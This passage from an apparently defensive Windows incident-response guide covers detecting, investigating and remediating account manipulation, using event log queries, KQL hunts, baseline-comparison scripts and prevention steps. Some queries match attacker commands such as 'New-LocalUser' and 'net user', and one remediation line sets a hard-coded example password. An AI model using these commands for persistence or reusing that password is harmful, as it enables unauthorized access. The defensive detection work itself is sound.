auditpol /get /category:"Account Management"
```

**🕵️ Inspect Event Logs for Account Creation**

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720}
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Account Creation Events**

```kusto
// SecurityEvent (Windows Security log in Log Analytics / Sentinel) has no Timestamp, DeviceName
// or AccountName columns; SubjectUserName is the actor, TargetUserName the account that was created.
SecurityEvent
| where EventID == 4720
| project TimeGenerated, Computer, SubjectUserName, TargetUserName
```

**🕵️ Detect Accounts Added to Admin Groups**

```kusto
SecurityEvent
| where EventID == 4728
// for 4728 TargetUserName is the group; MemberName is the account that was added
| project TimeGenerated, Computer, SubjectUserName, TargetUserName, MemberName
```

**🕵️ Detect Suspicious Account Modifications**

```kusto
SecurityEvent
| where EventID in (4722, 4724, 4725, 4738)
| project TimeGenerated, Computer, EventID, SubjectUserName, TargetUserName
```

**🕵️ Monitor Password Changes**

```kusto
SecurityEvent
| where EventID == 4724
// SubjectUserName reset the password of TargetUserName
| project TimeGenerated, Computer, SubjectUserName, TargetUserName
```

**🕵️ Detect Disabled Security Auditing**

```kusto
DeviceProcessEvents
| where ProcessCommandLine contains "auditpol"
| where ProcessCommandLine contains "/set"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Monitor Suspicious PowerShell Commands**

```kusto
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "New-LocalUser" or ProcessCommandLine contains "Add-LocalGroupMember"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                                     |
| ------------ | --------------------------------------------------- |
| **4720**     | A user account was created.                         |
| **4722**     | A user account was enabled.                         |
| **4724**     | An attempt was made to reset an account's password. |
| **4725**     | A user account was disabled.                        |
| **4728**     | A user was added to a privileged group.             |
| **4738**     | A user account was changed.                         |

**📌 Focus on Event ID 4720 (Account Creation):**

* Look for unusual account names and timestamps.

**📌 Focus on Event ID 4728 (Added to Admin Group):**

* Check if accounts were added unexpectedly to `Administrators`.

**📌 Focus on Event ID 4724 (Password Reset):**

* Look for accounts with passwords reset by unusual accounts.
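The three "focus" checks above as one script (an added example, not code from the original page): each 4720, 4724 and 4728 event is normalised into a who-did-what-to-whom record, and records whose actor is outside an allowlist are returned. `$ApprovedAdmins` is a constructed list; 4732 is included as an addition beyond the page's table because membership changes to the local `Administrators` group are logged as 4732 (local group), while 4728 covers global groups.

```powershell
# Added example (not from the original page): normalise account-change events into
# Subject (actor) / Target / Member records and flag actors not on the approved list.
# $ApprovedAdmins is a constructed, assumed list; replace it with your provisioning accounts.
$ApprovedAdmins = @('svc-provisioning', 'helpdesk-admin')

function Get-EventDataValue {
    # Read one named EventData field from an event record's XML.
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Get-AccountChangeRecord {
    # For 4720/4724 Target is the affected account; for 4728/4732 Target is the group and Member the added account.
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $action = switch ($Event.Id) {
        4720 { 'AccountCreated' }
        4724 { 'PasswordReset' }
        4728 { 'AddedToGlobalGroup' }
        4732 { 'AddedToLocalGroup' }
        default { "Event$($Event.Id)" }
    }
    $member = if ($Event.Id -in 4728, 4732) { Get-EventDataValue $Event 'MemberName' } else { $null }
    [pscustomobject]@{
        Time     = $Event.TimeCreated
        Action   = $action
        Subject  = Get-EventDataValue $Event 'SubjectUserName'
        Target   = Get-EventDataValue $Event 'TargetUserName'
        Member   = $member
        Computer = $Event.MachineName
    }
}

function Test-UnexpectedActor {
    # True when the actor is not one of the approved provisioning accounts.
    param([string]$Subject)
    return -not ($ApprovedAdmins -contains $Subject)
}

Get-WinEvent -FilterHashtable @{LogName = 'Security'; Id = 4720, 4724, 4728, 4732} -ErrorAction SilentlyContinue |
    ForEach-Object { Get-AccountChangeRecord $_ } |
    Where-Object { Test-UnexpectedActor $_.Subject } |
    Sort-Object Time -Descending
```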

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Identify Suspicious Accounts**

* Check recently created accounts:

```powershell
# Get-LocalUser has no creation timestamp; PasswordLastSet is the closest local proxy (see Event ID 4720 for the exact time)
Get-LocalUser | Where-Object { $_.PasswordLastSet -gt (Get-Date).AddDays(-7) }
```

***

#### 2️⃣ **Inspect Privileged Group Membership**

* Review `Administrators` group:

```powershell
Get-LocalGroupMember -Group "Administrators"
```

***

#### 3️⃣ **Trace Password Changes**

* Inspect Event Logs:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4724}
```

***

#### 4️⃣ **Audit Account Policies**

* Ensure auditing is enabled:

```powershell
auditpol /get /category:"Account Management"
```

***

#### 5️⃣ **Review Suspicious Commands**

* Check for suspicious command execution:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*net user*" }
```
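Steps 1 and 2 above turned into a repeatable host check (an added example, not code from the original page): one function snapshots local users and `Administrators` membership to JSON, another diffs the current state against that baseline and reports new accounts, re-enabled accounts, recent password sets and new admin members. The baseline path is an assumed location.

```powershell
# Added example (not from the original page): baseline and diff local accounts and the
# Administrators group. Get-LocalUser has no creation timestamp, so PasswordLastSet inside the
# look-back window is used as the "recently created or reset" signal. Baseline path is assumed.
function Get-LocalAccountSnapshot {
    [pscustomobject]@{
        Taken  = (Get-Date).ToString('o')
        Users  = @(Get-LocalUser | ForEach-Object {
            [pscustomobject]@{ Name = $_.Name; Enabled = $_.Enabled; PasswordLastSet = $_.PasswordLastSet; Sid = $_.SID.Value }
        })
        Admins = @(Get-LocalGroupMember -Group 'Administrators' | ForEach-Object { $_.Name })
    }
}

function Save-LocalAccountBaseline {
    param([string]$Path = 'C:\Baseline\local-accounts.json')
    New-Item -ItemType Directory -Path (Split-Path $Path) -Force | Out-Null
    Get-LocalAccountSnapshot | ConvertTo-Json -Depth 4 | Set-Content -Path $Path
}

function Compare-LocalAccountBaseline {
    # Returns one finding object per deviation from the saved baseline; no output means no change.
    param([string]$Path = 'C:\Baseline\local-accounts.json', [int]$LookBackDays = 7)
    $old = Get-Content -Path $Path -Raw | ConvertFrom-Json
    $new = Get-LocalAccountSnapshot
    $oldUsers = @{}; foreach ($u in $old.Users) { $oldUsers[$u.Sid] = $u }   # key on SID, not name, to survive renames
    $since = (Get-Date).AddDays(-$LookBackDays)
    $findings = @(foreach ($u in $new.Users) {
        $prev = $oldUsers[$u.Sid]
        if (-not $prev) { [pscustomobject]@{ Finding = 'NewAccount'; Account = $u.Name } }
        elseif ($u.Enabled -and -not $prev.Enabled) { [pscustomobject]@{ Finding = 'AccountEnabled'; Account = $u.Name } }
        if ($u.PasswordLastSet -and $u.PasswordLastSet -gt $since) { [pscustomobject]@{ Finding = 'PasswordSetRecently'; Account = $u.Name } }
    })
    $findings += @(foreach ($a in $new.Admins) {
        if ($old.Admins -notcontains $a) { [pscustomobject]@{ Finding = 'NewAdminMember'; Account = $a } }
    })
    return $findings
}

# Usage: Save-LocalAccountBaseline once on a known-good host, then Compare-LocalAccountBaseline during triage.
```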

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Disable Suspicious Accounts**

```powershell
Disable-LocalUser -Name "SuspiciousUser"
```

#### 📌 **2. Remove Unauthorized Group Membership**

```powershell
Remove-LocalGroupMember -Group "Administrators" -Member "SuspiciousUser"
```

#### 📌 **3. Reset Compromised Account Passwords**

```powershell
net user Administrator NewP@ssw0rd!
```

#### 📌 **4. Enable Security Auditing**

```powershell
auditpol /set /category:"Account Management" /success:enable /failure:enable
```

#### 📌 **5. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Account Auditing:**
   * Ensure **Event IDs 4720, 4728, 4724, and 4738** are logged.
2. **Use Least Privilege Principle:**
   * Limit admin access to essential accounts only.
3. **Implement Strong Password Policies:**
   * Enforce **complex passwords** and regular password changes.
4. **Restrict Account Creation:**
   * Use **Group Policy** to restrict account creation permissions.
5. **Enable Multi-Factor Authentication (MFA):**
   * Prevent unauthorized account access.
6. **Monitor Critical Accounts:**
   * Set up alerts for admin accounts and privileged group changes.
7. **Educate Administrators:**
   * Train admins to recognize and respond to account manipulation attempts.

***

### 🧠 **6. Key Takeaways**

* **Account Manipulation Enables Persistence:** Attackers use it for long-term access.
* **Monitor Privileged Groups:** Admin group changes are a red flag.
* **Audit Account Changes:** Focus on **Event IDs 4720, 4728, 4724**.
* **Prevent Unauthorized Account Modifications:** Use **Group Policy** and **MFA**.

***